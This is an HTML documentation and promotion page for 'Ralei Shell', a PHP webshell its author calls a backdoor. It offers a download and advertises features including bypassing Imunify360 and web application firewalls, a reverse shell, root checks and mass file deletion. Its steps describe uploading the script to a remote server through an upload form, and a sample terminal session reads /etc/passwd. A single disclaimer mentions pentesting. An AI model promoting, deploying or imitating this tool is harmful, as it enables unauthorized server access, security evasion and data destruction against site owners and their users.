<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <title>Ralei Shell - Documentation</title>
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="robots" content="index">
  <meta name="description" content="Ralei Shell is a highly responsive and powerful script that offers unlimited possibilities for your webshells b4ckdoor.">
  <meta name="author" content="Rahman Ralei">
  <style>
    body {
     background-color: #12172e;
      color: #fff;
      font-family: 'Exo 2', sans-serif;
      margin: 0;
      padding: 0;
    }
    
    .container {
      max-width: 800px;
      margin: 0 auto;
      padding: 20px;
    }
    
    .text {
      animation: motionBlur 2s linear infinite;
    }
    
    @keyframes motionBlur {
      0% {
        text-shadow: 0 0 15px rgba(255, 0, 0, 0.5);
      }
      15% {
        text-shadow: 0 0 15px red;
      }
      25% {
        text-shadow: 0 0 15px cyan;
      }
      50% {
        text-shadow: 0 0 20px rgba(0, 255, 0, 0.5);
      }
      75% {
        text-shadow: 0 0 15px pink;
      }
      100% {
        text-shadow: 0 0 15px rgba(0, 0, 255, 0.5);
      }
    }

    a {
      list-style-type: none;
      display: inline-block;
      background-color: #ff6f00;
      color: #fff;
      padding: 10px 20px;
      border-radius: 5px;
      text-decoration: none;
      transition: background-color 0.3s ease;
    }
    
    a:hover {
      background-color: #ff902e;
    }
    
    @media (max-width: 600px) {
      .container {
        padding: 10px;
      }
    }

    .img-fluid-rounded {
     max-width: 100%;
     height: auto;
     border-radius: 10px;
     border: 3px solid #aaaaaa;
     }
     
    pre {
     background-color: rgba(0, 0, 0, 0.5);
     padding: 5px;
     border-radius: 10px;
    }

     .text-center {
      text-align: center;
     }

  </style>
  <link href="https://fonts.googleapis.com/css?family=Exo+2&display=swap" rel="stylesheet">
</head>
<body>
  <div class="container">
    <h1 class="text">{RALEI SHELL}</h1>
    <p class="text">Ralei Shell is a highly responsive and powerful script that offers unlimited possibilities for your webshells b4ckdoor.</p>
    <a href="/RALEI-SHELL/download/index.html">Download Ralei Shell</a>
  </div>
  
  <div class="container">
    <h2 class="text">Features</h2>
    <ul class="text">
      <li>Responsive And Well Layout</li>
      <li>Bypass Imunify360 (Tested In v6.12.4-1)</li>
      <li>Bypass Blank Shell (Size 0kb)</li>
      <li>Bypass Other Firewall (WAF)</li>
      <li>Adminer (PHP Adminer)</li>
      <li>Command Shell (Terminal)</li>
      <li>Locked File</li>
      <li>Back Connect (Reverse Shell)</li>
      <li>Check Auto Root Server</li>
      <li>Searching File Name</li>
      <li>View Web File Or Directory On Browser</li>
      <li>Mass Delete File And Directory</li>
      <li>Mass Chmod File And Directory</li>
      <li>And Other...</li>
    </ul>
  </div>
  
  <div class="container">
    <h2 class="text">Getting Started</h2>
    <p class="text">To get started with Ralei Shell, follow these steps:</p>
    <ol class="text">
      <li>Ensure that PHP is installed on your system.</li>
      <li>Download the Ralei Shell script from the official website or repository.</li>
      <li>Extract the files to a web target or directory on your computer.</li>
      <li>Upload the RALEI SHELL script to the remote server using form UPLOAD or other file transfer methods.</li>
      <li>Access the RALEI SHELL script using a web browser.</li>
      <li>You will now be in the Ralei Shell and can start executing commands.</li>
    </ol>
  </div>
  
  <div class="container">
    <h2 class="text">Command (Terminal) Examples</h2>
    <h3 class="text text-center">Terminal</h3>
     <img src="https://f.top4top.io/p_2696w4ehg0.jpg" alt="cmd preview" class="img-fluid-rounded" style="width: 100%;">
    <p class="text">Here are some examples of commands you can execute in Ralei Shell:</p>
    <pre><code>php&gt; echo "Hello, Ralei Shell!";
Hello, Ralei Shell!

php&gt; ls
Directory Listing:
- file1.txt
- file2.txt
- directory1
- directory2

php&gt; cd directory1

php&gt; pwd
Current Directory: /path/to/directory1

php&gt; cat file1.txt
Contents of file1.txt...

php&gt; cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin</code></pre>
  </div>
  
  <div class="container">
    <h2 class="text">Ralei Shell Security</h2>
    <p class="text">When using Ralei Shell, several security measures are implemented to ensure the safety and integrity of your system:</p>
    <ul class="text">
      <li>Authentication: Ralei Shell utilizes login authentication to prevent unauthorized access.</li>
      <li>Noindex and Nofollow: The use of "noindex" and "nofollow" tags helps protect your script from being indexed by search engines and prevents unauthorized external links.</li>
      <li>Privacy Protection: Ralei Shell safeguards your privacy by implementing measures to prevent unauthorized individuals from manipulating or accessing your script without permission.</li>
    </ul>
  </div>

  <div class="container">
    <h2 class="text">Usage</h2>
    <p class="text">RALEI SHELL can be used to perform various tasks on a remote server, such as uploading files, executing commands, and modifying permissions. You can access the RALEI SHELL script using a web browser and use the various features included in the script to perform these tasks.</p>
  </div>
  
  <div class="container">
    <h2 class="text">Conclusion</h2>
    <p class="text">RALEI SHELL is a powerful script that offers a wide range of features for managing a remote server. With its ability to bypass various security measures and perform tasks such as uploading files, executing commands, and modifying permissions, RALEI SHELL is a useful tool for web developers and penetration testing (pentesting). It is important to use RALEI SHELL responsibly and only on servers that you have permission to access. If you encounter any issues or have any questions about RALEI SHELL, please consult the documentation or contact the developer for assistance.</p>
  </div>
  
  <div class="container">
    <h2 class="text">Preview</h2>
         <h3 class="text text-center">Login</h3>
      <img src="https://a.top4top.io/p_2697pnm300.png" alt="Ralei Shell Preview Login" class="img-fluid-rounded" style="width: 100%;">
<br>
         <h3 class="text text-center">Main Page Desktop</h3>
     <img src="https://k.top4top.io/p_2696kdeqg0.jpg"  alt="Ralei Shell Preview 1" class="img-fluid-rounded" style="width: 100%;">
<br>
          <h3 class="text text-center">Main Page Desktop Mobile</h3>
     <img src="https://c.top4top.io/p_2696oaes40.jpg" alt="Ralei Shell Preview 2" class="img-fluid-rounded" style="width: 100%;">
  </div>

  <div class="container">
    <h2 class="text">Our Support</h2>
    <h3 class="text text-center">SenpaiSquad Team</h3>
    <img src="https://i.top4top.io/p_26964bzbz0.jpg" alt="Team" class="img-fluid-rounded" style="width: 100%;">
    <br>
    <h3 class="text text-center">Ghost Exploiter Team</h3>
    <img src="https://l.top4top.io/p_2700se5jg0.jpeg" alt="Team2" class="img-fluid-rounded" style="width: 100%;">
    <br>
    <p class="text">For any questions or assistance with Ralei Shell, feel free to reach out to our dedicated support team at rahmansenpai06@gmail.com. We are here to help you make the most of Ralei Shell and ensure a smooth experience.</p>
  </div>
</body>
</html>
